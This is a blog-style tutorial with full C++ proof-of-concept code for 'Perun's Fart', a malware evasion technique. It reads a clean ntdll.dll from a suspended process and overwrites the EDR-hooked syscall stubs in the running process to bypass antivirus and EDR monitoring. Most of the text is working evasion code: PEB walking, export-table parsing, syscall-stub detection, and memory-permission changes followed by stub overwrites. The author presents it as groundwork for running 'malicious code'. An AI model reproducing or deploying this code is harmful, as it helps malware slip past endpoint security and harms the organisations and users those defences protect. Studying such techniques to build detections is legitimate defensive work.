API Unhooking with Perun's Fart
Pre-requisites
To fully understand this topic, one needs to have some knowledge about the following concepts:
- Little bit of C++ programming
- Some knowledge of API hooking by AV/EDR software
- Basic understanding of the PE structures
- Basic knowledge about Win32 APIs and their workings
Introduction
Recently, while going through some malware evasion techniques, I came across a fairly new and uncommon technique called Perun’s Fart, described in a blog post by Sektor7. It focuses on retrieving a fresh, unhooked copy of ntdll.dll.
This is done by creating a process in a suspended state. At that point the suspended process does not yet have any functions hooked by the EDR. According to the original blog, this takes advantage of the gap between a new process being spawned and the AV/EDR injecting its custom DLL. We will dive into this later on.
We then copy the syscall stubs from the fresh ntdll.dll into our current process, which gives us an unhooked version.
Overview of the technique
- First we need to create a process in a suspended state
- Then we need to find the base address of ntdll.dll in our current process
- ntdll.dll is mapped at the same base address in every process of the same bitness for a given boot session, so its base address in the suspended process will be the same
- Therefore, we read the complete ntdll.dll from the suspended process at that address
- Then we parse the Export Directory of both the fresh ntdll.dll and that of our current process
- We look for Nt APIs, extract their syscall stubs from the fresh ntdll.dll and copy them over the ntdll of our current process
- Then we can terminate the suspended process and continue with our malicious code. (Although, in this POC I have not used any injection code.)
Implementing the first part of the code
For this I will be using C++, because I find it easier to work with some of the built-in structures and APIs. I will try to break down the technique into smaller parts and get into each detail. I have tried to add my own improvements on top of the C# code by plackyhacker, which I believe is closer to the Windows Evasion Course by Sektor7.
Refer to my original POC : https://github.com/dosxuz/PerunsFart
Why suspended process?
To get a fresh copy of ntdll we need to create a suspended process, as already stated, and read ntdll.dll from it. But why is the ntdll in the suspended process not hooked? I got this answer, to some extent, from this StackOverflow thread.
According to this thread, only ntdll.dll is initially mapped, and an APC is queued to run when the thread resumes. This calls ntdll!LdrpInitializeProcess, which initializes the execution environment (e.g. language support, the heap, thread-local storage, the KnownDlls directory), loads kernel32.dll and gets the address of BaseThreadInitThunk, does static DLL imports, breaks for an attached debugger, and runs the init routines. Then execution jumps to ntdll!RtlUserThreadStart, which calls kernel32!BaseThreadInitThunk, which calls the EXE’s entry point such as WinMainCRTStartup.
Therefore, when the process is started, only ntdll.dll is mapped at first. For this reason, if you attach to a suspended process using x64Dbg, you’ll find that only ntdll.dll is in the modules list.
Since the process is in a suspended state, the queued APC has not run either. LdrpInitializeProcess is therefore never called, and as a result the rest of the modules are not loaded.
As we can see in the above picture, only ntdll.dll and the program itself are loaded.
NOTE: If you’re using a debugger like WinDbg, it will force the loading of other modules as soon as you attach to the process.
Reading fresh ntdll
Now that we know why we need a suspended process to get a fresh copy of ntdll, we need to implement it.
- First we need to create a process in a suspended state using the CreateProcessA API.
- The following code is inside the main() function
STARTUPINFOA* si = new STARTUPINFOA();
PROCESS_INFORMATION* pi = new PROCESS_INFORMATION();
//BOOL stat = CreateProcessA_p(nullptr, (LPSTR)"C:\\Windows\\System32\\svchost.exe", nullptr, nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr, si, pi);
BOOL stat = CreateProcessA_p(nullptr, (LPSTR)"cmd.exe", nullptr, nullptr, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, nullptr, "C:\\Windows\\System32\\", si, pi);
HANDLE hProcess = pi->hProcess;
printf("PID : %d\n", pi->dwProcessId);
- Next we find the base address of ntdll.dll by traversing the loaded modules in the process
- For this, we use a custom function by paranoidninja. Here it is named GetDll()
WCHAR findname[] = L"ntdll.dll\x00";
PVOID ntdllBase = GetDll(findname);
printf("ntdll.dll base address : 0x%p\n", ntdllBase);
- We pass the name of the DLL whose base address we want to locate (in this case ntdll.dll), and the function returns its base address.
- The following is the code of the GetDll() function
PVOID GetDll(PWSTR FindName)
{
_PPEB ppeb = (_PPEB)__readgsqword(0x60);
ULONG_PTR pLdr = (ULONG_PTR)ppeb->pLdr;
ULONG_PTR val1 = (ULONG_PTR)((PPEB_LDR_DATA)pLdr)->InMemoryOrderModuleList.Flink;
PVOID dllBase = nullptr;
ULONG_PTR val2;
while (val1)
{
PWSTR DllName = ((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.pBuffer;
dllBase = (PVOID)((PLDR_DATA_TABLE_ENTRY)val1)->DllBase;
if (wcscmp(FindName, DllName) == 0)
{
break;
}
val1 = DEREF_64(val1);
}
return dllBase;
}
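- The above function uses the intrinsic __readgsqword() to read the 8-byte value at offset 0x60 from the gs segment base. On x64 the gs segment points at the TEB, and the value at that offset is the pointer to the PEB (Process Environment Block)
- From the PEB structure, we find the address of the loader data, or Ldr
- Then we traverse the loaded modules through Ldr in order to get the base address of ntdll
- Note that the module lists are circular, so the while (val1) condition never becomes false on its own if the name is not matched; in this POC ntdll.dll is always present, so the loop breaks on the match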
Extracting Loaded Modules through the Loader Data
Before we move further, we need to understand the concept of how different modules are accessed and loaded in a process. For this, we will take help of WinDbg.
- The Process Environment Block (PEB) has an Ldr member at offset 0x018. We can view the structure of the PEB using dt nt!_PEB
- This Ldr is a pointer to a PEB_LDR_DATA structure. We can get the address of Ldr by using the command !peb
- Now if we view the data at address 0x00007ffb38f1a4c0 as type PEB_LDR_DATA, we find the following
- We see that there are 3 doubly linked lists: InLoadOrderModuleList, InMemoryOrderModuleList and InInitializationOrderModuleList. These are of type LIST_ENTRY, and each link is embedded in a structure of type LDR_DATA_TABLE_ENTRY
- Therefore, we can typecast these structures as LDR_DATA_TABLE_ENTRY
dt nt!_LDR_DATA_TABLE_ENTRY 0x000002d2`270d2ef0
- Here we take the starting address of InLoadOrderModuleList for the example.
- Once we typecast it to LDR_DATA_TABLE_ENTRY, we will have the starting address of the next link.
- We see that the first loaded module is the program itself, cmd.exe
- Now we have the starting address of the next link, 0x000002d2270d2d20, which we can typecast in the same way
dt nt!_LDR_DATA_TABLE_ENTRY 0x000002d2`270d2d20
- We find that the next loaded module is ntdll.dll
- Along with the name, we also get the base address.
This technique essentially removes our dependency on the GetModuleHandle API, which in some cases might be hooked or blacklisted.
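The list walk described above can be illustrated without any Windows headers. The following is only a minimal sketch: ListEntry, ModuleEntry, FindModuleBase, DemoList and Demo are hypothetical stand-ins invented for this example, not the real LIST_ENTRY and LDR_DATA_TABLE_ENTRY layouts. It shows the general idea of following Flink through a circular list and stopping once the walk is back at the list head.

```cpp
#include <cassert>
#include <cstdint>
#include <cwchar>

// Hypothetical, simplified stand-ins for LIST_ENTRY and LDR_DATA_TABLE_ENTRY.
struct ListEntry {
    ListEntry* Flink;
    ListEntry* Blink;
};

struct ModuleEntry {
    ListEntry      Links;        // embedded link, deliberately the first member
    void*          DllBase;
    const wchar_t* BaseDllName;
};

// Follow Flink from the head and stop when the walk returns to the head,
// so a missing module ends the loop instead of cycling forever.
void* FindModuleBase(ListEntry* head, const wchar_t* name) {
    assert(head != nullptr && name != nullptr);
    for (ListEntry* link = head->Flink; link != head; link = link->Flink) {
        // Links is the first member, so the entry starts at the same address.
        auto* entry = reinterpret_cast<ModuleEntry*>(link);
        if (entry->BaseDllName && std::wcscmp(entry->BaseDllName, name) == 0)
            return entry->DllBase;
    }
    return nullptr;  // not found
}

// Demo data only: a two-module circular list with made-up base addresses.
struct DemoList {
    ListEntry   head{};
    ModuleEntry exe{};
    ModuleEntry ntdll{};
    DemoList() {
        exe.DllBase = reinterpret_cast<void*>(std::uintptr_t{0x10000});
        exe.BaseDllName = L"cmd.exe";
        ntdll.DllBase = reinterpret_cast<void*>(std::uintptr_t{0x20000});
        ntdll.BaseDllName = L"ntdll.dll";
        head.Flink = &exe.Links;          exe.Links.Blink = &head;
        exe.Links.Flink = &ntdll.Links;   ntdll.Links.Blink = &exe.Links;
        ntdll.Links.Flink = &head;        head.Blink = &ntdll.Links;
    }
};

DemoList& Demo() {
    static DemoList d;
    return d;
}
```

On Windows the link is not always the first member of the entry, which is why the CONTAINING_RECORD macro is normally used to get from a link back to its enclosing structure.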
Reading the entire ntdll with NtReadVirtualMemory
Now that we have the base address of ntdll, we need to read the fresh copy. ntdll.dll is mapped at the same base address in every process of the same bitness until the next reboot, so its base address in the suspended process is the same as in ours. Therefore, we can use this same address to read from the suspended process.
- Before reading from the suspended process, we need to know how many bytes we have to read.
- We can get this from the SizeOfImage field of the OptionalHeader structure.
- We can parse the optional header as follows:
PIMAGE_DOS_HEADER ImgDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS ImgNTHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + (ImgDosHeader->e_lfanew));
IMAGE_OPTIONAL_HEADER OptHeader = (IMAGE_OPTIONAL_HEADER)ImgNTHeaders->OptionalHeader;
PIMAGE_SECTION_HEADER textsection = IMAGE_FIRST_SECTION(ImgNTHeaders);
DWORD ntdllSize = OptHeader.SizeOfImage;
- First we typecast the base of ntdll to the DOS Header structure
- Next, we add the value of e_lfanew to the base of the image, in order to get the NT Headers
- Once we have the NT Headers we can obtain the Optional Header from it
- We also need the header of the first section, which we get from the NT Headers using the macro IMAGE_FIRST_SECTION(). For ntdll this is the .text section. This will be used later on.
- Now that we have the size of the ntdll image, we need to allocate memory of the same size using VirtualAlloc
LPVOID freshNtdll = VirtualAlloc(NULL, ntdllSize, MEM_COMMIT, PAGE_READWRITE);
- Then we use NtReadVirtualMemory to read that same number of bytes from the suspended process, starting at the ntdll base address
DWORD bytesread = NULL;
printf("Fresh NTDLL : 0x%p\n", freshNtdll);
NtReadVirtualMemory_p(hProcess, ntdllBase, freshNtdll, ntdllSize, &bytesread);
Now we will have the fresh ntdll at the address freshNtdll.
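The header walk used above to find SizeOfImage can also be sketched on a plain byte buffer, which makes the offsets explicit. This is an illustrative sketch, not the POC's code: ReadAt, SizeOfImage and MakeDemoHeader are hypothetical helper names, and a little-endian host is assumed. It relies on the PE layout in which e_lfanew sits at offset 0x3C of the DOS header, the optional header starts 24 bytes after the PE signature, and SizeOfImage sits at offset 56 of the optional header.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <optional>
#include <vector>

// Bounds-checked read of a T at byte offset off (assumes a little-endian host).
template <typename T>
std::optional<T> ReadAt(const std::vector<std::uint8_t>& buf, std::size_t off) {
    if (off > buf.size() || buf.size() - off < sizeof(T)) return std::nullopt;
    T value;
    std::memcpy(&value, buf.data() + off, sizeof(T));
    return value;
}

// DOS header -> e_lfanew -> NT headers -> OptionalHeader.SizeOfImage.
std::optional<std::uint32_t> SizeOfImage(const std::vector<std::uint8_t>& image) {
    auto magic = ReadAt<std::uint16_t>(image, 0);
    if (!magic || *magic != 0x5A4D) return std::nullopt;        // "MZ"
    auto lfanew = ReadAt<std::uint32_t>(image, 0x3C);           // e_lfanew
    if (!lfanew) return std::nullopt;
    auto sig = ReadAt<std::uint32_t>(image, *lfanew);
    if (!sig || *sig != 0x00004550) return std::nullopt;        // "PE\0\0"
    // 4-byte signature + 20-byte file header = 24, then +56 inside the optional header.
    return ReadAt<std::uint32_t>(image, std::size_t{*lfanew} + 24 + 56);
}

// Demo data only: a zeroed buffer with just enough header fields filled in.
std::vector<std::uint8_t> MakeDemoHeader(std::uint32_t sizeOfImage) {
    std::vector<std::uint8_t> buf(0x200, 0);
    const std::uint32_t lfanew = 0x80;
    assert(buf.size() >= lfanew + 24 + 56 + sizeof(sizeOfImage));
    buf[0] = 'M';
    buf[1] = 'Z';
    std::memcpy(buf.data() + 0x3C, &lfanew, sizeof(lfanew));
    const std::uint8_t pe[4] = {'P', 'E', 0, 0};
    std::memcpy(buf.data() + lfanew, pe, sizeof(pe));
    std::memcpy(buf.data() + lfanew + 24 + 56, &sizeOfImage, sizeof(sizeOfImage));
    return buf;
}
```

The bounds checks matter more here than in the in-process version, because a buffer read from another process or from disk may be truncated or malformed.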
Unhooking the current ntdll
We now need to extract the syscall stubs of the Nt functions from the fresh ntdll and write them over the Nt functions of the hooked ntdll.
This whole thing is done through the DoShit() function
DoShit(ntdllBase, freshNtdll, textsection);
It takes the parameters ntdllBase (the hooked ntdll), freshNtdll (the unhooked copy read from the suspended process), and textsection (the text section of the current ntdll).
Getting the Export Directory
- The DoShit() function looks as follows
void DoShit(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_SECTION_HEADER textsection)
{
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(freshntDllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
printf("Error\n");
PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory = NULL;
if (!GetImageExportDirectory(ntdllBase, &hooked_pImageExportDirectory) || hooked_pImageExportDirectory == NULL)
printf("Error\n");
OverwriteNtdll(ntdllBase, freshntDllBase, hooked_pImageExportDirectory, pImageExportDirectory, textsection);
}
- The first function that we need to use is GetImageExportDirectory()
- It takes the base address of ntdll (it takes both the hooked and unhooked versions in two different calls)
- First we get the Export Directory of the fresh ntdll and then the Export Directory of the hooked ntdll
- GetImageExportDirectory works as follows:
BOOL GetImageExportDirectory(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory)
{
//Get DOS header
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
return FALSE;
}
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)ntdllBase + pImageDosHeader->e_lfanew);
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
return FALSE;
}
// Get the EAT
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)ntdllBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
return TRUE;
}
- It first gets the pointer to the DOS Header from the image base
- Then it gets the pointer to the NT Headers by adding the value of e_lfanew to the image base
- From the Optional Header it takes the DataDirectory array and adds the virtual address of the entry at index 0 to the image base
- This is because the entry at index 0 (IMAGE_DIRECTORY_ENTRY_EXPORT) is that of the Export Directory. We can confirm this from CFF Explorer
- Therefore, we have the pointer to the export tables of both the hooked and unhooked versions of ntdll
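The functions in the next section resolve a name to an address through three arrays in the Export Directory: AddressOfNames, AddressOfNameOrdinals and AddressOfFunctions. As a rough sketch of that indirection, the example below uses a hypothetical ExportView structure in which the RVAs have already been turned into ordinary containers. ExportView, ResolveExportRva and MakeDemoExports are names invented for this illustration, and the demo values are made up.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical, simplified view of an export directory.
struct ExportView {
    std::vector<const char*>   names;         // AddressOfNames
    std::vector<std::uint16_t> nameOrdinals;  // AddressOfNameOrdinals, parallel to names
    std::vector<std::uint32_t> functions;     // AddressOfFunctions, indexed by ordinal
};

// Name index i -> nameOrdinals[i] -> functions[that ordinal]. Returns 0 if not found.
std::uint32_t ResolveExportRva(const ExportView& ev, const char* wanted) {
    assert(ev.names.size() == ev.nameOrdinals.size());
    for (std::size_t i = 0; i < ev.names.size(); ++i) {
        if (std::strcmp(ev.names[i], wanted) != 0) continue;
        const std::uint16_t ordinalIndex = ev.nameOrdinals[i];
        if (ordinalIndex >= ev.functions.size()) return 0;  // malformed table
        return ev.functions[ordinalIndex];
    }
    return 0;
}

// Demo data only: the names and RVAs are invented for the example.
ExportView MakeDemoExports() {
    return ExportView{
        {"NtClose", "NtOpenFile", "RtlZeroMemory"},
        {2, 0, 1},
        {0x2000, 0x3000, 0x1000},
    };
}
```

The point of the sketch is that the name index and the function index are not the same thing: the ordinal array sits between them, which is why the POC indexes pdwAddressOfFunctions with pwAddressOfNameOrdinales[cx] rather than with cx directly.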
Extracting addresses of Nt APIs
- After getting the Export Directories of both versions of the DLL, we call the OverwriteNtdll function
- It takes the base addresses and Export Directories of both versions of ntdll, along with the text section header
void OverwriteNtdll(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PIMAGE_SECTION_HEADER textsection)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNameOrdinals);
for (WORD cx = 0; cx < hooked_pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
{
PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
if (funcAddress != 0x00 && std::strcmp((CHAR*)"NtAccessCheck", pczFunctionName) != 0)
{
printf("Function Name : %s\n", pczFunctionName);
printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
//Change the write permissions of the .text section of the ntdll in memory
DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_READWRITE, textsection->Misc.VirtualSize);
//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
//Change back to the old permissions
ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
}
}
}
printf("Completed Overwriting ntdll.dll\n");
getchar();
}
- This function in turn calls the GetTableEntry() function (taken from HellsGate by am0nsec), which takes the base address of the ntdll and the Export Directory of that same version of the ntdll, as well as the name of the function whose address we want to extract.
PVOID GetTableEntry(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, CHAR* findfunction)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNameOrdinals);
PVOID funcAddress = 0x00;
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (std::strcmp(findfunction, pczFunctionName) == 0)
{
WORD cw = 0;
while (TRUE)
{
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
return 0x00;
}
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
return 0x00;
}
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
WORD syscall = (high << 8) | low;
//printf("Function Name : %s", pczFunctionName);
//printf("Syscall : 0x%x", syscall);
return pFunctionAddress;
break;
}
cw++;
}
}
}
return funcAddress;
}
- Although I have modified it to suit our current requirements, the core concept remains the same
- This function first initializes the pointers to the array of function addresses, the array of function names, and the array of name ordinals
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNameOrdinals);
- It initializes the function address as 0x0
PVOID funcAddress = 0x00;
- It then iterates through all the function names in the Export Directory, using pImageExportDirectory->NumberOfNames as the upper limit
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (std::strcmp(findfunction, pczFunctionName) == 0)
{
WORD cw = 0;
while (TRUE)
{
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
return 0x00;
}
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
return 0x00;
}
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
WORD syscall = (high << 8) | low;
//printf("Function Name : %s", pczFunctionName);
//printf("Syscall : 0x%x", syscall);
return pFunctionAddress;
break;
}
cw++;
}
}
}
- The outer for loop first calculates the address of the function name (as a char pointer) and the address of the function
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
- As soon as it finds the function name that we are looking for, it enters an inner while loop
if (std::strcmp(findfunction, pczFunctionName) == 0)
{
WORD cw = 0;
while (TRUE)
{
- Then we have the following code inside the while loop
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
return 0x00;
}
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
return 0x00;
}
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
WORD syscall = (high << 8) | low;
//printf("Function Name : %s", pczFunctionName);
//printf("Syscall : 0x%x", syscall);
return pFunctionAddress;
break;
}
cw++;
- In this code, the variable cw of type WORD is used as a byte offset, starting from the function address
- The first if statement checks whether the two bytes at the current offset are 0x0f and 0x05. These are the opcode bytes of the syscall instruction, which means we have scanned past the start of the stub.
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
return 0x00;
}
- The next if statement checks whether the current byte is 0xc3. In this case we have reached the ret instruction.
// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
return 0x00;
}
- In both cases, it is treated as an error and the function returns 0x0 as the address
- But in the third if statement, it checks whether the first 4 bytes are 0x4c, 0x8b, 0xd1, 0xb8 and the bytes at the 7th and 8th positions are 0x0. These bytes encode mov r10, rcx followed by mov eax, <syscall number>, which means that we are exactly at the syscall stub.
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
WORD syscall = (high << 8) | low;
//printf("Function Name : %s", pczFunctionName);
//printf("Syscall : 0x%x", syscall);
return pFunctionAddress;
break;
}
- From here we can either extract the syscall number (for some other techniques like Hell’s Gate) or return the address of the function. This check is important to make sure that we have landed on the exact entry point of an Nt function.
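The byte checks walked through above can be condensed into a small function that works on any byte buffer. The sketch below is an illustration under stated assumptions, not the POC's code: FindSyscallNumber and the two demo arrays are hypothetical names, and the demo bytes are hand-written rather than taken from a real ntdll. It applies the same three tests in the same order and returns the 16-bit syscall number when the stub prologue is found.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>

// Scan forward for: 4C 8B D1 (mov r10, rcx) B8 lo hi 00 00 (mov eax, imm32).
// Gives up if a syscall (0F 05) or ret (C3) byte sequence is seen first.
std::optional<std::uint16_t> FindSyscallNumber(const std::uint8_t* code, std::size_t len) {
    assert(code != nullptr);
    for (std::size_t off = 0; off + 8 <= len; ++off) {
        const std::uint8_t* p = code + off;
        if (p[0] == 0x0F && p[1] == 0x05) return std::nullopt;  // already at syscall
        if (p[0] == 0xC3) return std::nullopt;                  // already at ret
        if (p[0] == 0x4C && p[1] == 0x8B && p[2] == 0xD1 && p[3] == 0xB8 &&
            p[6] == 0x00 && p[7] == 0x00) {
            return static_cast<std::uint16_t>((p[5] << 8) | p[4]);
        }
    }
    return std::nullopt;
}

// Demo data only: a hand-written stub prologue with syscall number 0x55.
constexpr std::uint8_t kDemoCleanStub[] = {
    0x4C, 0x8B, 0xD1, 0xB8, 0x55, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3};

// Demo data only: the same bytes with the prologue replaced by a jmp rel32.
constexpr std::uint8_t kDemoHookedStub[] = {
    0xE9, 0x10, 0x20, 0x30, 0x40, 0xCC, 0xCC, 0xCC, 0x0F, 0x05, 0xC3};
```

Taking an explicit length is a deliberate difference from the while (TRUE) loop in the walkthrough: the scan cannot run past the end of the buffer it was given.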
Understanding the OverwriteNtdll function
Now that we know how the GetTableEntry function works, we can start with the OverwriteNtdll function.
void OverwriteNtdll(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PIMAGE_SECTION_HEADER textsection)
{
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNameOrdinals);
for (WORD cx = 0; cx < hooked_pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
{
PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
if (funcAddress != 0x00 && std::strcmp((CHAR*)"NtAccessCheck", pczFunctionName) != 0)
{
printf("Function Name : %s\n", pczFunctionName);
printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
//Change the write permissions of the .text section of the ntdll in memory
DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_READWRITE, textsection->Misc.VirtualSize);
//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
//Change back to the old permissions
ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
}
}
}
printf("Completed Overwriting ntdll.dll\n");
getchar();
}
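- This function walks the export table in the same way as GetTableEntry, but instead of checking for the syscall stub, it checks whether the function name contains Nt. Since strstr matches the substring anywhere in the name, the stub check inside GetTableEntry is what is relied on to filter out names that are not actual Nt functions.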
if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
{
PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
if (funcAddress != 0x00)
{
printf("Function Name : %s\n", pczFunctionName);
printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
//Change the write permissions of the .text section of the ntdll in memory
DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_WRITECOPY, textsection->Misc.VirtualSize);
//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
//Change back to the old permissions
ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
}
}
- If it is an Nt function, then it extracts the address of that same function from the fresh ntdll
- Then it checks whether there has been any error, by checking if funcAddress is 0x00 or not
- Before we can overwrite the hooked API with the correct bytes, we need to change the access permissions of that memory region. In this excerpt I am using PAGE_EXECUTE_WRITECOPY, which is the bare minimum permission that we need (the full listing above uses PAGE_EXECUTE_READWRITE and additionally skips NtAccessCheck)
